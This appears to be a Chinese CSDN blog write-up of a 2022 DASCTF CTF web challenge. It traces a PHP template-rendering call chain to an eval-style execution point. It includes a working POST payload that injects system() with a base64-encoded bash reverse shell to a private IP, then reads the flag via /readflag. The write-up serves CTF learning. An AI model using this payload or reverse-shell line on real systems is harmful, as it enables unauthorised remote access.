2022DASCTF Apr X FATE 防疫挑战赛 warmup-php

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量2.4k 收藏 1
点赞数 1
分类专栏: 安恒月赛 文章标签: ctf web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/124389965
版权

主页代码逻辑就是自动加载class下类文件,然后动态调用一个类,并设置成员变量。最后调用类的run()方法。

在这里插入图片描述

看uml类图其实就大致有数该实例化哪个类了,TestView
在这里插入图片描述

看这几个类文件的内容,很明显的页面模板生成代码,感觉是根据YII2框架的模板渲染提取的主要逻辑

先找漏洞点,在Base类中

在这里插入图片描述

再去找调用链,搜索run()方法,在ListView类中

在这里插入图片描述

接着跟到renderContent,会去调用类中的renderSection方法,$this->template需为{test}形式,才会被正则匹配,去调用renderSection函数
在这里插入图片描述

renderSection函数会拼接方法名,然后调用该方法,$matches[1]的内容就是$this->template变量{ }内的内容

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5F0SBvIj-1650799632438)(images/image-20220423173335854.png)]

接下来的函数调用就简单了,就是些变量赋值,最后调用evaluateExpression()函数到达函数执行点

在这里插入图片描述
在这里插入图片描述

/?action=TestView

#POST传参
properties[rowHtmlOptionsExpression]=system("bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'")&properties[template]={TableBody}&properties[data][0]=111

直接反弹shell就行,读flag.txt提示没权限,ls -l / 看一下 使用/readflag读取即可

在这里插入图片描述

Arnoldqqq
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OK展出全新阵列封装返修系统APR-5000-DZ
12-01
OK International (OK公司) 将于2007年8月28-31日在中国深圳举行的 Nepcon South China 展会上 (展台编号 2B10) ,展出全新阵列封装返修系统APR-5000-DZ,这是该公司针对BGA 和 SMT返修推出全面APR-5000系列的最新...
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2523
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF部分复现
qq_63928796的博客
08-08 2319
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 883
简单题
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 5034
DASCTF Apr.2023 X SU Writeup By AheadSec
DASCTF2022 ——十月赛 Web 部分Writeup
渗透测试研究中心
10-28 1467
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
DASCTF 2022九月赛WEB
weixin_43952190的博客
09-22 760
CTF
apr.rar_Apr-00
09-21
标题中的"apr.rar_Apr-00"似乎与一个名为"apr-00"的项目或设备相关,可能是一个特定的电路设计或者软件版本。"Apr-00"可能是该设备或项目的代号,其中"Apr"可能代表April(四月),也可能是一个缩写,比如"Advanced ...
apr-util-1.6.1.zip
09-06
2、apr-1.7.0.tar 报错: rm: cannot remove `libtoolT': No such file or directory 解决: configure中#$RM "$cfgfile" 3、apr-util-1.6.1.tar 报错: fatal error:expat.h:no such file or directory  #...
apr-util-1.5.4.tar.gz
10-26
标题中的"apr-util-1.5.4.tar.gz"是一个开源软件库的归档文件,它属于Apache Portable Runtime (APR)项目的一部分。APR是一个为各种操作系统提供统一API的库,主要用于处理底层系统功能,如文件I/O、网络通信、进程...
apr1-md5:Apache 在纯 PHP 中的 APR1-MD5 算法
06-25
Apache 在 PHP 中的 APR1 MD5 散列算法 生成 Apache 的 apr1-md5 密码哈希的最佳方法不可能来自。...// Check plaintext password against an APR1-MD5 hashecho APR1_MD5 :: check ( 'plaintext' , '$apr
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 339
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
DASCTF 2023 & 0X401七月暑期挑战赛-Crypto复现
Emmaaaaa's blog
07-24 911
关键词:光滑数,Franklin-Reiter相关消息攻击,copper求t,groebner_basis() 之前做过相关消息攻击的题,但都是那种一眼就能看出来的,这次遇到两道不寻常的,值得记录,求解方法也更加多元化了哈哈,只能说还有待提高,继续加油吧!
安恒月赛 DASCTF 7月赛
pone2233的博客
07-25 1180
文章目录比赛介绍比赛感受Miscwelcome to the misc world | 成功QrJoker | 未验证过,因为比赛结束了 比赛介绍 安恒月赛 DASCTF 7月赛 比赛感受 这次太菜了,都做只做了2个,哎,我觉得还需要锻炼,加油。 Misc welcome to the misc world | 成功 拿到文件使用7z这个压缩包软件,直接能看到这个flag,在这里,可是需要解压密码 我就开始分析一下这个给的素材 在图片红色通道看到png的格式 点击这个Save Bin 保存一个图片文件
2021-DASCTF-三月赛-Writeup
热门推荐
末初的CSDN博客
03-29 1万+
文章目录WEBMISC签到简单的png隐写雾都孤儿小田的秘密Ascii_art问卷调查 和团队的师傅们组队拿了个第十,师傅们带飞,我就是团队的MVP(Most Vegetable People) WEB 等复现环境出来了再写 MISC 签到 公众号语音识别:异世相遇!尽享美味!安恒赛高! 见笑了,偶四南方银,藕的普通话不镖准哈哈哈~ DASCTF{welcome_to_march_dasctf} 简单的png隐写 一开始以为hint.png是伪加密,flag.jpg是真加密,结果后
DASCTF九月挑战赛复现-web
your_friends的博客
10-18 758
那么他就会直接将product合并到order原型链上那么他就可以直接添加token进入下面的判断语句了。可以发现在调用buyapi接口的时候直接将body作为实参传过去了,所以我们就可以控制product。那么我们只需要修改其中的分数,用它原来的方法对他进行一次发包就可以拿到flag。下面的代码可以看到只有当他的密码是截取的1到6位的时候才会获得9999块钱。e就是分数,t就是我们的checkcode我们直接在页面中对他进行调用。这里是可以直接传入URL的,URL会进行编码。
全国农信银CTF流量分析(凯撒会分析流量吗)
yoyo_573的博客
06-30 323
流量分析,时间盲注,题目提示了凯撒密码。转换下就得到了结果。
[MISC]2022DASCTF Apr X FATE 防疫挑战赛
RookieMOR的博客
05-06 918
1.SimpleFlow; 2.熟悉的猫; 3.冰墩墩; 1.SimpleFlow: 下载得到SimpleFlow的压缩包,解压得到SimpleFlow.pcapng,流量分析题目。查找 flag. ,可以知道一共有四个flag.txt文件,一个flag.zip文件。用kali的foremost指令可以分离出flag.zip文件,发现flag.zip需要密码。 再追踪每个flag.txt。 发现蚁剑流量,一个一个base64解码, 在其中一个txt文件中得到: Y2QgIi9Vc2Vy.
apr-1.7.0-win32-src.zip
09-30
apr-1.7.0-win32-src.zip是一个用于Windows平台的Apache Portable Runtime(APR)库的源代码压缩包。APR是一个跨平台的库,它提供了在Apache服务器和其他使用APR的项目中常见的底层功能。 该压缩包包含了APR库的源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值